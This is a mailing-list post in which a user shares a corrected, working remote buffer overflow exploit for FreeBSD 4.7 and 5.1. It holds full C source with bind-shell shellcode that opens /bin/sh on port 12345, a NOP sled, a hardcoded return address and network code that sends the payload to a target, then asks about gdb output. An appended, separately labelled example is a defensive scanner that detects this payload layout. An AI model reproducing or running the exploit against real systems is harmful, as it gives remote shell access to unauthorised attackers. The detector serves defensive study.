
Problem with sample buffer overflow exploit solved



Hi,

Thanks to all the people who helped me. Finally I solved my problem :)

Here is my corrected version of the exploit. It worked on FreeBSD 5.1 and FreeBSD 4.7.
-------------------------------------------------------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>      /* atoi */
#include <string.h>      /* memset, memcpy */
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>

/*
 * FreeBSD shellcode - binds /bin/sh to a port 12345
 * Claes M. Nyberg 20020619
 * <cmn@xxxxxxxxxxx>, <md0claes@xxxxxxxxxxxxxxxxxx>
 */
char shellcode[]=                                         /* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";

#define RET 0xbfbffa48

int main(int argc, char *argv[]) {
        char buffer[1064];
        int s,t, i, size,offset;
        struct sockaddr_in remote;
        struct hostent *host;

        if(argc != 4) {
                printf("Usage: %s target-ip port offset\n", argv[0]);
                return -1;
        }
        offset = RET - atoi(argv[3]);

        // filling buffer with NOPs
        memset(buffer, 0x90, 1064);

        printf("scsize: %d\nret: 0x%x\n", (int)sizeof(shellcode)-1, offset);

//copying shellcode into buffer, at offset 140,150,200 it works finally :):):):)
        memcpy(buffer+851-sizeof(shellcode) , shellcode, sizeof(shellcode)-1);

// Copying the return address multiple times at the end of the buffer...
        for(i=1010; i < 1060; i+=4) {
                * ((int *) &buffer[i]) = offset;
        }
        buffer[1063] = 0x0;

        //getting hostname
        host=gethostbyname(argv[1]);
        if (host==NULL)
        {
                fprintf(stderr, "Unknown Host %s\n",argv[1]);
                return -1;
        }

        // creating socket...
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0)
        {
                fprintf(stderr, "Error: Socket\n");
                return -1;
        }
        remote.sin_family = AF_INET;
        remote.sin_addr = *((struct in_addr *)host->h_addr);
        remote.sin_port = htons(atoi(argv[2]));

        // connecting with destination host
        if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
        {
                close(s);
                fprintf(stderr, "Error: connect\n");
                return -1;
        }
        //sending exploit string
        size = send(s, buffer, sizeof(buffer), 0);
        if (size==-1)
        {
                close(s);
                fprintf(stderr, "sending data failed\n");
                return -1;
        }
        // closing socket
        close(s);
        return 0;
}
-------------------------------------------------------------------------------------------------------------------------------
The problem before was that I placed the shellcode in the wrong place, and the shellcode executed only partly. I moved my shellcode to a different place and moved the return address as well, and it finally worked. It spawns a shell
on port 12345.
So it is really important to know where to place the shellcode and the return address. Also, the return address
must point to one of the NOPs before the shellcode.

One more question.

When the exploit is sent, in another terminal where I run the vulnerable program from gdb I see:
-------------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x080480c0 in ?? ()
-------------------------------------------------------------------------------------------------------------------------------
When I issue the command x/200bx $esp-200 I see the following:
-------------------------------------------------------------------------------------------------------------------------------
(gdb) x/200bx $esp-200
0xbfbffd34:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd3c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd44:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd4c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd54:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd5c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd64:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd6c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd74:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd7c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd84:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd8c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd94:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd9c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffda4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdac:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdb4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdbc:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdc4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdcc:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdd4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffddc:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffde4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdec:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdf4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
(gdb)

What does it mean? Does it mean that the program exited cleanly? Or does it say it executed the shellcode correctly?
Can somebody explain it to me a little bit?

thanks in advance,

Ganbold
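Added example, not code from the post or its author, written from the defender's side: the payload described above is a long run of 0x90 NOPs, the shellcode, and one return address repeated every four bytes near the end of the buffer. This scanner flags a received byte buffer with that layout. The thresholds (64 NOPs, 4 repeats) and the sample buffer, which uses filler letters where the shellcode would sit, are assumptions constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Signals of the layout the post describes: a run of NOPs plus one 32-bit
 * value repeated back to back (the candidate overwritten return address). */
struct sled_report {
    size_t longest_nop_run;
    size_t max_word_repeats;
    uint32_t repeated_word;
};

struct sled_report scan_for_sled(const unsigned char *buf, size_t len) {
    struct sled_report r = {0, 0, 0};
    size_t run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > r.longest_nop_run) r.longest_nop_run = run;
    }
    /* Try all four alignments: the sender controls where the words start. */
    for (size_t start = 0; start < 4; start++) {
        size_t reps = 0;
        uint32_t prev = 0, w;
        for (size_t i = start; i + 4 <= len; i += 4) {
            memcpy(&w, buf + i, 4);
            if (w == 0x90909090u) { reps = 0; continue; } /* inside the sled */
            reps = (reps > 0 && w == prev) ? reps + 1 : 1;
            prev = w;
            if (reps > r.max_word_repeats) { r.max_word_repeats = reps; r.repeated_word = w; }
        }
    }
    return r;
}

/* Thresholds are assumptions for this example, not tuned values. */
int looks_like_sled_payload(const unsigned char *buf, size_t len) {
    struct sled_report r = scan_for_sled(buf, len);
    return r.longest_nop_run >= 64 && r.max_word_repeats >= 4;
}

/* Constructed sample with the post's layout for a 1064-byte buffer: NOPs,
 * filler letters where the shellcode would sit, the post's RET value
 * 0xbfbffa48 repeated from offset 1010 to 1060, and a trailing NUL. */
void build_sample(unsigned char *buf, size_t len) {
    uint32_t addr = 0xbfbffa48u;
    memset(buf, 0x90, len);
    for (size_t i = 700; i < 800 && i < len; i++) buf[i] = (unsigned char)('A' + i % 26);
    for (size_t i = 1010; i < 1060 && i + 4 <= len; i += 4) memcpy(buf + i, &addr, 4);
    if (len) buf[len - 1] = 0;
}
```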